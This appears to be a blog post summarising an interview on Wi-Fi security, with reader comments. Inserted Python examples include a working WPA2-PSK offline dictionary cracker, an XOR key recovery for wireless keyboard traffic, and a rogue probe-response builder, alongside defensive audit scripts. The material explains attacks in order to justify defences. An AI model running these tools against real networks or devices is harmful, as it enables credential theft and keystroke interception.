Wi-Fi Security is always one step behind


Maintaining security is the unending worry of every network administrator, wired or wireless. So why focus on Wi-Fi security? To explain, I want to highlight a very interesting chat transcript about wireless security on NetworkWorld. The chat featured a mentor of mine (electronically speaking) and renowned wireless security expert, Joshua Wright. The fact that he authored the SANS course “Assessing and Securing Wireless Networks” says something about his abilities. I would like to think that I share his unique sense of humor and fondness for sushi, as professed in the name of his website, willhackforsushi.com.

The chat drew many great questions, and the NetworkWorld moderators, Julie Bort in particular, did an admirable job of fielding them and presenting them to Joshua. Since the session was quite long, I thought I would highlight several of the questions and answers that I hope will be of particular interest to members.

Question: How secure is WPA-PSK or WPA2-PSK?

Joshua Wright: PSK-based authentication mechanisms are notoriously vulnerable to offline dictionary attacks. I wrote one of the first WPA/WPA2-PSK attack tools, "coWPAtty." (Get it? "coW-PAtty" -- like the cow … excrement). Newer tools such as Aircrack-ng are even faster. The main problem with PSK mechanisms is that the same shared secret is stored on all devices. I was talking to a customer who was doing handheld credit card transactions with a wireless device using WPA2-PSK. They were PCI compliant (since PCI requires WPA or all kinds of hoops with WEP), but they were vulnerable in that as devices were lost, stolen or turned in for service, the PSK was disclosed and available to anyone who could get their hands on the device. Enterprises should use 802.1X instead of PSK-based authentication strategies for stronger authentication and unique, per-user keys.
Question: How should organizations address the threat of driver vulnerabilities?

Joshua Wright: Since a driver vulnerability can expose a workstation to a remote compromise, and since the vulnerability is exploited in kernel space, which bypasses local security mechanisms (such as privilege separation, intrusion prevention mechanisms, spyware and anti-virus tools, etc.), it's a serious threat. Organizations should start by compiling a list of all the wireless drivers they have installed in their organization, and regularly check the vendors' websites for driver updates.

I've also written a tool to assist in enumerating installed drivers on Windows hosts that includes a vulnerability assessment component. The tool is called WiFiDEnum. A free tool available at http://labs.arubanetworks.com/wifidenum, WiFiDEnum scans hosts over your wired (or wireless) network and enumerates all the wireless drivers that are installed, using a local database of known vulnerabilities to let you know when you are exposed to driver threats.

I would like to add that WiFiDEnum is a very useful tool and does exactly what it advertises. At the time of writing the download was available at the Aruba Labs link above; several readers report in the comments that the files were later pulled from that site.
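The first question above deserves a concrete look at why PSK cracking is an offline job. Once an attacker has captured one 4-way handshake, every piece of the key derivation except the passphrase is in the capture, so candidate passphrases can be tested at leisure with no further contact with the network. The following is an added example, not code from the article, from coWPAtty or from Aircrack-ng: it derives the PMK and PTK exactly as 802.11i specifies, builds a constructed stand-in for handshake message 2 (the MAC addresses, nonces and EAPOL-Key bytes are made up), and then recovers the passphrase from a short wordlist by recomputing the MIC.

```python
import hashlib
import hmac

# EAPOL-Key MIC field offset: 4 (802.1X header) + 1 (descriptor type) + 2 (key info)
# + 2 (key length) + 8 (replay counter) + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # Same passphrase plus same SSID gives the same PMK for every station on the network.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min/max(MACs) || min/max(nonces) || i)
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(5)
    )
    return out[:64]  # KCK = out[:16], KEK = out[16:32], TK = out[32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed stand-in for a sniffed message 2 of the 4-way handshake.
    Only the fields the attack needs are populated."""
    frame = bytearray(99)
    frame[0:4] = b"\x01\x03\x00\x5f"  # 802.1X v1, EAPOL-Key, body length 95
    frame[4] = 2                      # RSN key descriptor
    frame[5:7] = b"\x01\x0a"          # key info: version 2 (HMAC-SHA1), pairwise, MIC present
    frame[17:49] = snonce             # key nonce field carries SNonce in message 2
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": bytes(frame)}


def crack_psk(hs, wordlist):
    """Offline attack: recompute the MIC for each candidate passphrase and compare.
    PBKDF2 with 4096 iterations is the only cost, and it is paid per candidate, not per station."""
    frame = bytearray(hs["eapol"])
    captured = bytes(frame[MIC_OFFSET:MIC_OFFSET + 16])
    frame[MIC_OFFSET:MIC_OFFSET + 16] = b"\x00" * 16
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, bytes(frame)), captured):
            return candidate
    return None


# Constructed capture: made-up MACs and nonces, SSID "corp-wifi", passphrase "correct horse".
DEMO_HANDSHAKE = build_handshake(
    "correct horse", "corp-wifi",
    bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
    bytes(range(32)), bytes(range(32, 64)),
)
DEMO_WORDLIST = ["letmein", "password", "correct horse"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(DEMO_HANDSHAKE, DEMO_WORDLIST))
```

The PMK derivation can be checked against the published 802.11i test vector (passphrase "password", SSID "IEEE"). Note what the code does not need: no association with the AP, no deauthentication beyond the one used to provoke the handshake, and no per-user secret, which is exactly the per-user key that 802.1X supplies and PSK does not.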

Question: Is WPA2 now considered very secure and we should feel fine using it? Or are there still attacks/vulnerabilities that it's susceptible to?

Joshua Wright: WPA2 provides strong encryption, and specifies strong authentication mechanisms such as PEAP, TTLS and EAP/TLS as well, so it is a strong strategy for organizations. The common problem with these implementations is when people misconfigure client settings for PEAP and TTLS, as I discussed with Brad Antoniewicz from Foundstone at Shmoocon a few weeks ago (slides at www.willhackforsushi.com, the video will be up at shmoocon.org shortly). If PEAP and TTLS aren't configured properly, an attacker can impersonate your RADIUS server and get access to the victim's inner authentication credentials, possibly disclosing the user's password, or giving the attacker access to the user's MS-CHAP challenge response, which is almost as good.
Question: Joshua, please let me know your thoughts on disabling broadcasting your router's SSID.

Joshua Wright: It's a bad idea. I know the PCI specification requires you to do this, and I've told them they need to remove this requirement from the specification. Imagine you are a government base and you don't tell your agents where you are located. They have to walk around and keep asking "Are you the government base?" to everyone they meet. Eventually, some wily hacker or bad guy will say "Heck YEAH I'm your base, come on in and share your secrets with me." This is essentially what happens with SSID cloaking, where you have to ask every AP you meet if their desired SSID is available, allowing an attacker to impersonate your SSID at the airport, coffee shop, in the airplane, etc. In short, don't cloak your SSID, but don't make your SSID something like "sexyhackertargethere" either.

I especially wanted to highlight this question and answer after having several rather lengthy discussions on the forum about this very subject. The point is worth restating plainly: cloaking only removes the name from the AP's beacons. Every client configured for that network then has to ask for it by name wherever it goes, so the name leaks anyway, and anyone listening can answer. In addition to the management overhead and control problems that not advertising the SSID causes, the vulnerability Joshua describes is a new twist that adds even more ammunition to my side of the debate.
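To make the "Are you the government base?" problem concrete, here is an added example (not code from the article or from Joshua's tools) that parses 802.11 management frames and reports which SSIDs each client is asking for by name. The frames are constructed in the block rather than captured, so it runs without a radio; the MAC addresses and the SSID "corp-wifi" are made up. A cloaked beacon carries an empty SSID element, a wildcard probe request also carries an empty one, and a directed probe request from a client configured for the hidden network carries the name in the clear. The last line of the demo shows that a probe response from any other station claiming that SSID parses identically to the real AP's, which is all the impersonation Joshua describes needs.

```python
import struct

MGMT_HDR_LEN = 24  # frame control, duration, addr1, addr2, addr3, sequence control
SUBTYPE_PROBE_REQ, SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 4, 5, 8
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(body: bytes) -> dict:
    """Information elements: 1-byte ID, 1-byte length, value. First occurrence of an ID wins."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies.setdefault(eid, body[i + 2:i + 2 + ln])
        i += 2 + ln
    return ies


def parse_mgmt(frame: bytes):
    """Return (subtype, sender MAC, SSID) for a management frame, or None for anything else."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if ftype != 0:  # 0 = management
        return None
    sa = frame[10:16]  # addr2 is the transmitter
    body = frame[MGMT_HDR_LEN:]
    if subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        body = body[12:]  # fixed fields: timestamp (8), beacon interval (2), capability (2)
    ssid = parse_ies(body).get(0, b"")  # element ID 0 = SSID
    return subtype, mac_str(sa), ssid.decode("utf-8", "replace")


def build_mgmt(subtype: int, sa: bytes, ssid: str, da: bytes = BROADCAST) -> bytes:
    """Constructed frames for the demo; in practice these come from a monitor-mode capture."""
    fc = bytes([subtype << 4, 0])
    bssid = sa if subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP) else da
    hdr = fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    if subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        hdr += struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, interval, capability (ESS+privacy)
    ssid_raw = ssid.encode()
    return hdr + bytes([0, len(ssid_raw)]) + ssid_raw


def ssid_leaks(frames):
    """Map client MAC -> set of SSIDs it asked for by name. A cloaked network forces its
    clients to do exactly this everywhere they go, and whoever hears the name can answer to it."""
    leaks = {}
    for f in frames:
        parsed = parse_mgmt(f)
        if parsed and parsed[0] == SUBTYPE_PROBE_REQ and parsed[2]:
            leaks.setdefault(parsed[1], set()).add(parsed[2])
    return leaks


# Constructed traffic: a cloaked AP, one client, and a stranger answering the client's probe.
AP, CLIENT, ATTACKER = (bytes.fromhex(h) for h in ("001122334455", "66778899aabb", "ccddeeff0011"))
DEMO_FRAMES = [
    build_mgmt(SUBTYPE_BEACON, AP, ""),                  # cloaked: SSID element present but empty
    build_mgmt(SUBTYPE_PROBE_REQ, CLIENT, ""),           # wildcard probe: leaks nothing
    build_mgmt(SUBTYPE_PROBE_REQ, CLIENT, "corp-wifi"),  # directed probe: the hidden name, in the clear
]
ROGUE_RESPONSE = build_mgmt(SUBTYPE_PROBE_RESP, ATTACKER, "corp-wifi", da=CLIENT)

if __name__ == "__main__":
    print("leaked SSIDs per client:", ssid_leaks(DEMO_FRAMES))
    print("rogue probe response parses as:", parse_mgmt(ROGUE_RESPONSE))
```

Nothing in the SSID element authenticates the AP; with PSK the client only finds out it is talking to a stranger when the 4-way handshake fails, and with PEAP/TTLS only if the supplicant validates the server certificate.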

Question: What new risks do you see regarding Bluetooth access points?

Joshua Wright: Bluetooth APs are problematic for organizations because they can offer the same range of 802.11b/g APs, but cannot be detected by 802.11 WIDS systems. This allows an attacker to introduce a rogue to your network, and escape detection by the WIDS system. This is something I used at a hospital a while back, where I faked "stomach pain" and plugged a Bluetooth AP into the waiting room electrical and RJ45 LAN jack. I used it to hack the hospital for a few weeks from the parking lot across the street until my connection disappeared. At the penetration test wrap-up, I asked for my Bluetooth AP back, and I got blank stares from the security team. Them: "What AP?" Me: "The AP I hid in the waiting room." Them: "We never found an AP." Yeah, SOMEONE STOLE MY AP!

I can personally attest to the effectiveness of this attack vector and to how far under the radar this pen-testing method flies. Since an 802.11 WIDS cannot hear a Bluetooth AP at all, the place to catch one is on the wire: an unexpected device appearing on a jack in a public area, or several MAC addresses suddenly showing up behind one port.
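As an added example of that wired-side check (not code from the article; the switch output, port names, baseline and MAC addresses are all constructed), the block below parses a MAC address table in the style of a Cisco `show mac address-table` listing and compares it with a baseline of what each port should carry. A port in a public area that suddenly has a device on it, or a port that grows extra MACs (a bridging AP shows its clients' MACs behind the same port), is flagged.

```python
import re

# Constructed baseline: expected MACs per switch port, and ports in areas the public can reach.
# In practice this comes from your NAC or IPAM, not a hand-written dict.
BASELINE = {
    "Gi1/0/1": {"0011.2233.4455"},  # nurses' station PC
    "Gi1/0/2": {"0011.2233.4466"},  # printer
    "Gi1/0/7": set(),               # waiting-room jack: should carry nothing
}
PUBLIC_PORTS = {"Gi1/0/7"}

# Constructed sample in the style of `show mac address-table` output.
SAMPLE_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
  10    0011.2233.4455    DYNAMIC     Gi1/0/1
  10    0011.2233.4466    DYNAMIC     Gi1/0/2
  10    00aa.bbcc.dd01    DYNAMIC     Gi1/0/7
  10    00aa.bbcc.dd02    DYNAMIC     Gi1/0/7
"""

ROW = re.compile(r"^\s*(\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+(\w+)\s+(\S+)", re.I)


def parse_mac_table(text: str) -> dict:
    """Map port -> set of MACs learned on it. Header and separator lines do not match ROW."""
    seen = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            _vlan, mac, _kind, port = m.groups()
            seen.setdefault(port, set()).add(mac.lower())
    return seen


def find_rogues(seen: dict, baseline: dict, public_ports: set) -> list:
    """Return (port, reason, new MACs) for every port carrying something the baseline lacks."""
    alerts = []
    for port, macs in seen.items():
        new = macs - baseline.get(port, set())
        if not new:
            continue
        if port in public_ports:
            alerts.append((port, "unexpected device on public-area port", sorted(new)))
        elif len(macs) > 1:
            alerts.append((port, "multiple MACs behind one port (bridging AP or switch?)", sorted(new)))
        else:
            alerts.append((port, "MAC not in baseline", sorted(new)))
    return alerts


if __name__ == "__main__":
    for alert in find_rogues(parse_mac_table(SAMPLE_TABLE), BASELINE, PUBLIC_PORTS):
        print(alert)
```

This is a stopgap; 802.1X on the wired ports (or at least port security with a MAC limit) stops the AP from getting a connection in the first place, and the parking-lot session never starts.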

Question: Can you explain some of the exploits available that can attack wireless mice and keyboards?

Joshua Wright: At the Blackhat Federal conference last week, Max Moser demonstrated attacks against 27 MHz keyboards and mice, where he is able to remotely capture and "decrypt" keystrokes and mouse positions. I use the phrase "decrypt" lightly, since as Max discovered, these devices often use only an XOR mechanism to protect data with a 16-bit "key." With this capability, it is possible to create a remote, undetectable keystroke logger, which can record every keystroke entered by the user. Further, it appears possible to inject arbitrary keystrokes as well. Max points out that WinKey + R (opening the Run dialog box) could be particularly useful for an attacker trying to compromise a system.

This shows once again how thinking outside the box creates new attack avenues. The "encryption" here is worth dwelling on: XOR with a short fixed key is not encryption in any useful sense, because the plaintext is highly structured (every byte must be a valid key code), so the key can be recovered from a handful of captured keystrokes.
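Here is an added example of that recovery (not code from the article or from Max Moser's work). It assumes, for illustration only, that the keyboard sends PC/XT set 1 make codes and that the 16-bit key is simply repeated across the payload; real devices may use a different code table or framing, but the method does not change. Because the key repeats every two bytes, each key byte can be attacked separately: only 256 candidates per lane need to be checked against "does every decoded byte look like a key press", so the whole search is 512 trials instead of 65536, and the few surviving combinations are easy to eyeball. The captured bytes are constructed in the block.

```python
# PC/XT "set 1" make codes for the keys used here (assumption: the device uses this table;
# any other fixed code table works the same way, only the dictionary changes).
SCAN_SET1 = {
    "q": 0x10, "w": 0x11, "e": 0x12, "r": 0x13, "t": 0x14, "y": 0x15, "u": 0x16,
    "i": 0x17, "o": 0x18, "p": 0x19, "a": 0x1E, "s": 0x1F, "d": 0x20, "f": 0x21,
    "g": 0x22, "h": 0x23, "j": 0x24, "k": 0x25, "l": 0x26, "z": 0x2C, "x": 0x2D,
    "c": 0x2E, "v": 0x2F, "b": 0x30, "n": 0x31, "m": 0x32, " ": 0x39, "\n": 0x1C,
}
CODE_TO_CHAR = {code: ch for ch, code in SCAN_SET1.items()}


def keystrokes_to_codes(text: str) -> bytes:
    return bytes(SCAN_SET1[c] for c in text.lower())


def xor16(data: bytes, key: int) -> bytes:
    """Assumed scheme: the 16-bit key repeats, so even bytes see key[0] and odd bytes see key[1].
    XOR is its own inverse, so this both 'encrypts' and 'decrypts'."""
    ks = key.to_bytes(2, "big")
    return bytes(b ^ ks[i & 1] for i, b in enumerate(data))


def recover_keys(ciphertext: bytes) -> list:
    """Return every (key, plaintext) pair under which all decoded bytes are valid key codes.
    The two key bytes are independent, so each lane is solved with 256 trials."""
    lanes = []
    for pos in (0, 1):
        lane = ciphertext[pos::2]
        lanes.append([k for k in range(256) if all((c ^ k) in CODE_TO_CHAR for c in lane)])
    hits = []
    for k0 in lanes[0]:
        for k1 in lanes[1]:
            key = (k0 << 8) | k1
            hits.append((key, "".join(CODE_TO_CHAR[b] for b in xor16(ciphertext, key))))
    return hits


# Constructed "sniffed" payload: a short typed sentence under the made-up key 0xBEEF.
CAPTURED = xor16(keystrokes_to_codes("the quick brown fox\n"), 0xBEEF)

if __name__ == "__main__":
    for key, text in recover_keys(CAPTURED):
        print(f"key {key:04x}: {text!r}")
```

Twenty keystrokes are enough to pin the key down to a couple of candidates; a longer capture, or a dictionary check on the decoded words, removes the rest. Once the key is known, injecting keystrokes is the same XOR in the other direction, which is why the WinKey + R remark matters.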

Question: If KARMA was the scariest wireless attack of 2006/2007, what's scariest for 2008 and beyond?

Joshua Wright: Well, I think attacking PEAP networks is pretty scary, but I'm a little biased. I am nervous about wireless driver attacks, and I think we're only starting to see the beginning of this attack trend (best noted by commercial vendors selling products for LOTS of money to test your drivers for you).
Question: What makes attacking PEAP networks so scary?

Joshua Wright: If I compromise your authentication credentials from PEAP, then I have your username and password, likely your MS Windows domain username and password. That also gives me access to your domain servers, Outlook, file servers, MS SQL, Sharepoint, etc. I think that's kinda scary, don't you?
Final thoughts

I hope I have pointed out some of the more interesting comments. If you are so inclined, please read the entire transcript; it is well worth the time. One practical takeaway from the two PEAP answers: the whole attack rests on the client accepting a RADIUS server it should not, so the supplicant configuration is where the fix lives. The client must be given the CA certificate to validate the server against and the server name it expects, otherwise any certificate, or any certificate from that CA, is good enough for a rogue.
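As an added example of that check (not code from the article or from the wpa_supplicant project), the block below holds two constructed wpa_supplicant network blocks for the same PEAP network, one misconfigured in the way Joshua describes and one hardened, and a small audit that parses them and reports the weaknesses. The option names (eap, phase2, ca_cert, domain_suffix_match, anonymous_identity) are real wpa_supplicant.conf options, and wpa_supplicant really does skip server certificate verification when no ca_cert is configured; the SSID, identity, password, certificate path and server name are made up.

```python
import re

# Constructed profile with the classic mistake: PEAP with no server validation at all.
WEAK_PROFILE = """
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed hardened profile: pinned CA plus the expected server name, and an anonymous
# outer identity so the real username is not sent in the clear before the tunnel is up.
HARDENED_PROFILE = """
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    anonymous_identity="anonymous@corp.example"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

KV = re.compile(r'^\s*(\w+)\s*=\s*"?([^"]*)"?\s*$')


def parse_network_blocks(text: str) -> list:
    """Minimal parser for network={ ... } blocks: one dict of key -> value per block."""
    blocks, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("network={"):
            current = {}
        elif s == "}" and current is not None:
            blocks.append(current)
            current = None
        elif current is not None:
            m = KV.match(s)
            if m:
                current[m.group(1)] = m.group(2)
    return blocks


def audit_profile(net: dict) -> list:
    """Findings for a PEAP/TTLS profile; an empty list means the server is pinned and named."""
    findings = []
    eap = net.get("eap", "").upper()
    if eap not in ("PEAP", "TTLS"):
        return findings
    inner = net.get("phase2", "").upper()
    if "ca_cert" not in net:
        what = "MS-CHAPv2 challenge/response" if "MSCHAPV2" in inner else "inner credentials"
        findings.append("no ca_cert: any server certificate is accepted, so a rogue RADIUS "
                        "can terminate the tunnel and collect the " + what)
    elif not (net.get("domain_suffix_match") or net.get("subject_match")):
        findings.append("ca_cert without domain_suffix_match: any certificate issued by that CA "
                        "is accepted as the RADIUS server")
    if eap == "TTLS" and "PAP" in inner:
        findings.append("TTLS/PAP: the password crosses the tunnel in cleartext; a rogue server reads it directly")
    if "anonymous_identity" not in net:
        findings.append("no anonymous_identity: the real username is sent unprotected in the outer EAP Identity")
    return findings


def audit(text: str) -> list:
    return [(n.get("ssid"), audit_profile(n)) for n in parse_network_blocks(text)]


if __name__ == "__main__":
    for label, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(label, audit(profile))
```

The same two settings have counterparts in every supplicant (on Windows: "Validate server certificate", the trusted root CA, and "Connect to these servers"), and a profile that lacks them is exactly what the rogue RADIUS attack from the Shmoocon talk needs.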


43 comments
Michael Kassner

I have emailed Joshua and hopefully he will let us know what the status is of WiFiDEnum.

ITSuper

Unable to get the link to work. It was a nice thought, though.

Dicac

They have pulled the wifidenum files from the site. What now?

CEdwards478

Does anyone have a link to the WiFiDEnum application? The one in the article doesn't seem to be valid anymore... Thanks.

w2ktechman

First to mention, I would doubt that a large enterprise or mid to large business would be using WPA/WPA2. WPA/WPA2 is more for small companies and/or home use. As for SSID broadcasting, that is a good reason to have SSID broadcasting instead of hidden. However, I disagree with its usefulness for many companies. If someone were phishing for credit cards, etc., they might be more inclined to connect to 'linksys' or the like, which would draw in many more people (unless a convention for a specific co. were there). Also keep in mind that the ones who use the default SSID are very likely to not pay much attention to Wi-Fi security at all, and are more likely to use wireless for banking, etc. at an airport, etc. Interesting about the BT APs. I now need to do a bit of looking up (for personal interest). Yes, I recommend not using wireless keyboards/mice in an office. However, every time I read something else about them (such as this) it seems that using them at home is just as bad an idea. Glad I broke mine (keyboard meets concrete) over a year ago. Yes, I have marked this article to come back and reference later when time is more available. I want to hit up the links provided. Thanks again, Michael!

Michael Kassner

Joshua Wright is pretty savvy when it comes to wireless security. Do you agree with his assessment of the newest security threats and attack avenues?

george.jenkins

What is the range for a wireless keyboard/mouse signal? Also, the article referenced BT APs; I thought BT had a short signal range.

Michael Kassner

I consider your comments to be valuable insight and I appreciate them.

seanferd

I had not heard that not broadcasting SSID is a vulnerability, usually, I hear the opposite. I really appreciate that particular bit of information. I have not the knowledge to agree or disagree as to what the newest security issues might be, but I'll be sure to find out what Joshua Wright has to say from now on. I do believe I've run across his site before, doing wireless home router research. Had you posted a link there previously? Now, let's see about those links...

cmyers

Now that link worked for me! I tried some of the others again, still without success. Very strange...

CEdwards478

Thanks, but even with those links I keep getting: "We're sorry, but the Web page you requested is unavailable. It is possible that the page may no longer exist or is simply not found. Please choose from the links on the right, which we hope will help you find what you're looking for, or Contact Aruba for further assistance."

Michael Kassner

I thought I would add a few comments about the ability to receive Bluetooth signals. I remember DefCon 2K4, where the first BlueSniper rifle was introduced, and I had to build one myself. It was pretty amazing; I was able to link up to a target approximately 100 yards away. I thought I would link to SmallNet Builder (best source for anything like this), as they have an even better design for a BlueSniper rifle. http://www.smallnetbuilder.com/content/view/24256/98/

robo_dev

Versus typically a 30mW-100mW or higher power used for 802.11b and its variants (subject to each country's local laws), 1mW typically limits it to about 30 feet, but with the appropriate receive antenna, much more distance can be possible. Do a Google search on 'blue sniper'. Since Bluetooth does not use Ethernet as its basis, hacking it is more technically complicated. While I have not seen exploits of Bluetooth keyboards, a hack of this sort would be very, very bad. Bluetooth security analysis: http://www.securityfocus.com/infocus/1830

The Scummy One

BT has been known (from my understanding) to be good up to 1/2 mile. However, that is in really good conditions. Normally, BT would be a very short distance, however it can still cause interference with other wireless technologies.

Michael Kassner

I have been in countless debates about the pros and cons of SSID broadcasting, and ultimately it is very dependent on the network topology. For example, not broadcasting the SSID on an MS AD network is just asking for trouble. All sorts of weird behavior results. The other thing that I do not like about not broadcasting the SSID is the huge increase in network management traffic that results from all the STAs trying to find the controlling AP. For proof, just start up a packet sniffer and test both ways.

CEdwards478

For me, it was not that Google wasn't turning up search results. It was the search on Aruba Networks' site that turned up no results. All links are working for me now, and the website layout/interface is entirely different from a few days ago when I couldn't access it... this is leading me to believe I was correct that they were moving (or updating) their website and my DNS servers were sending me to the old location that no longer had the content available.

seanferd

I still have no problem accessing the site, file download, or any of the search results for things related to WiFiDeNum or Aruba. I am puzzled by their inability to access such. My only guess is that there is some filtering going on somewhere.

Michael Kassner

Neon Samurai, I would be interested if you have the time. I am pretty sure Joshua will get back to me with information about the application. Maybe it has some issues and was pulled so as not to create any problems.

Neon Samurai

I can dig out the article if it is of interest. There is a form Google provides to request removal from their listings. If the program links were cut off and hosts wanted to remove all references, they could have filled out the request. I'm not sure if other search engines provide similar services. The idea that such a program would be pulled and links cut is disappointing and somewhat irrational, being that there are so many other programs that do the same thing.

CEdwards478

They were in the middle of moving their web servers, and some of us are resolving the old IP, and some the new... and one of them doesn't have the content anymore. Especially because more people below are saying they can't get the file.

cmyers

That link did not work for me. I'll bet it didn't for CEdwards478, either. Very very strange...

w2ktechman

IE7, Opera, and Safari with no issues (except in Opera it wanted me to enable a plug-in).

CEdwards478

Same for me regarding searching for it and trying multiple browsers. I submitted a comment to Aruba's Web Site team to see if they have any suggestions. It's not being blocked locally, because I administer all of our firewalls/content filters, and there is nothing turning up in the logs.

cmyers

I'm at a different organization and I'm getting the same message. Besides, if it was blocked, we'd not get anything from the Aruba site, or we should be served the "Content Blocked" message from our filter devices. It's not the browser, either, because I got the same result in IE7 and FF2.0. Also, when I type wifidenum in the search, it doesn't find anything either. Weird...

The Scummy One

Or something being blocked on your side, as the links worked fine for me.

Neon Samurai

I honestly don't know how open Bluetooth is to sniffing, but I've always avoided it like the plague since the only authentication is the initial device pairing. Also, is there any encryption of the signal between two paired devices? I think the most astounding thing I've heard recently was a medical office using Bluetooth to network all their computers and hardware; my first thought was wondering how many people walking down the sidewalk had already tried to pick something off the ad hoc BT network. Last I read, the idea was to cause the Bluetooth devices to require a re-pairing, then you simply sniff the packets while the unsuspecting owner makes their PDA talk to their notebook properly again. It's simply a wireless signal, so someone with a little programming could even make their Wi-Fi NIC pick up Bluetooth signal the same way you software-mod some NICs to pick up any other RF. Guess I'm off to read that analysis you linked, unless it's the same one I have sitting on my Maemo but haven't got around to reading.

manishshukla

Did you know there is a new cool and intimate new sushi place in Rome which offers high quality Japanese foods for eating or take-away, and offers great hand-made cakes and free wifi to all customers? http://naoko-sushi-roma.blogspot.com/

Neon Samurai

2600 Magazine, v22n1, Spring 2005, page 23. Author: Chess. The article first discusses configuration and code for your HTML pages: <meta name="robots" content="noindex,nofollow"> and including the following in robots.txt: User-agent: * Disallow: / Once that is done, your website should be skipped over by any browsing bots, including Google's creepy crawlers. Now that you won't fall back into the database, make the request to have existing entries removed: http://services.google.com/urlconsole/controller The article author states that he was out of the database within 12 hours but that it may take up to 24 hours. Also, it's recommended that the meta tags be used in all your HTML. If you only do your initial pages, then any subpages of your site that are linked from other locations will be scanned. If all pages contain the meta tags, then the crawler will skip your pages even if some other site directs it into a backwater page in your collection. If you want back into the listings, remove the meta tags and robots.txt and you should fall back in through the normal process the next time Google's creepy crawler gets to your URL. http://www.google.com.gr/remove.html Google's Listing Removal Resource is listed as a source for the article. I'm not sure if this is still applicable, but I don't see any reason why it wouldn't be, at least in some updated form.

JCitizen

Couldn't have said it better myself. Your quote: {Another axiom I subscribe to is that the "level of security should be comparable to the value of the information you are trying to protect". } Exactly the advice my clients get from me; just not said with such eloquence.

seanferd

I was just reaching an understanding as to how not broadcasting SSID was actually a security-through-obscurity measure. Here, I am focused only on very small home networks. In the past I'd read in quite a few places that turning off broadcast would essentially "hide" a wireless connection, as in not shouting, "We're here". What I got from the article is: this doesn't matter. That is to say, a drive-by cracker can pretend to be your computer's router. Then the cracker can get into the PC, as opposed to just trying to steal an internet connection, which seems to be the focus with home wireless routers. MAC filtering is very simple in this case: allow these two or three MACs only. I don't envy those of you who manage enterprise networks. (Well, maybe I do, but not for these things!)

Neon Samurai

In my own network, I config every setting in the router because it's there, and leaving a screw loose or bolt unpinned just seems downright wrong. I have fewer than thirty MACs to worry about, though, and infrequent additions or removals. I also make a hobby of security for security's sake, but I can recognize that and keep it within my own systems. :) The SOHO network in my care is similar; same router even, but with a shorter and more static MAC list. Managing an enterprise Wi-Fi access point would be a whole other headache, though, since the MAC count would be so much higher. I don't know if even the SharePoint appliances have an efficient process for handling MACs through batch processing.

Michael Kassner

MAC filtering in my mind is very different from "not broadcasting SSID". It is a valid security measure, and it works when you consider a significant number of users. It only loses credibility when you are trying to prevent pen testing from a skilled attacker. It is a difficult management operation when you have an enterprise wireless network, but maybe helpful for consumer or SOHO operations. Another axiom I subscribe to is that the "level of security should be comparable to the value of the information you are trying to protect". That way you have an idea as to what is sufficient and how many layers you should have in place to have a certain level of confidence. I typically view security in percentages; roughly, I approximate what percentage of the available users are able to overcome a certain security measure. It seems to work, as it keeps me aware of the fact that I never reach 100% security.

Neon Samurai

It's not going to stop someone from spoofing a MAC your access point recognizes, but it will at least tell your AP not to listen for noise from any device it doesn't think it recognizes. If it thinks it recognizes a device, then it does the proper WPA authentication to be sure the other is not a stranger in a good MAC costume. Now, if only we could kill that "security through obscurity" myth. :)

seanferd

"Security through obscurity." That comment definitely reinforced the idea I've taken away from this article and thread. Not broadcasting SSID doesn't mean that you've closed any door. Everything I've heard in favor of not broadcasting implies that you have effectively shut off some part of the system, disallowing any other system from fooling your PC or router into accepting it as part of the network. This is obviously not the case.

S,David

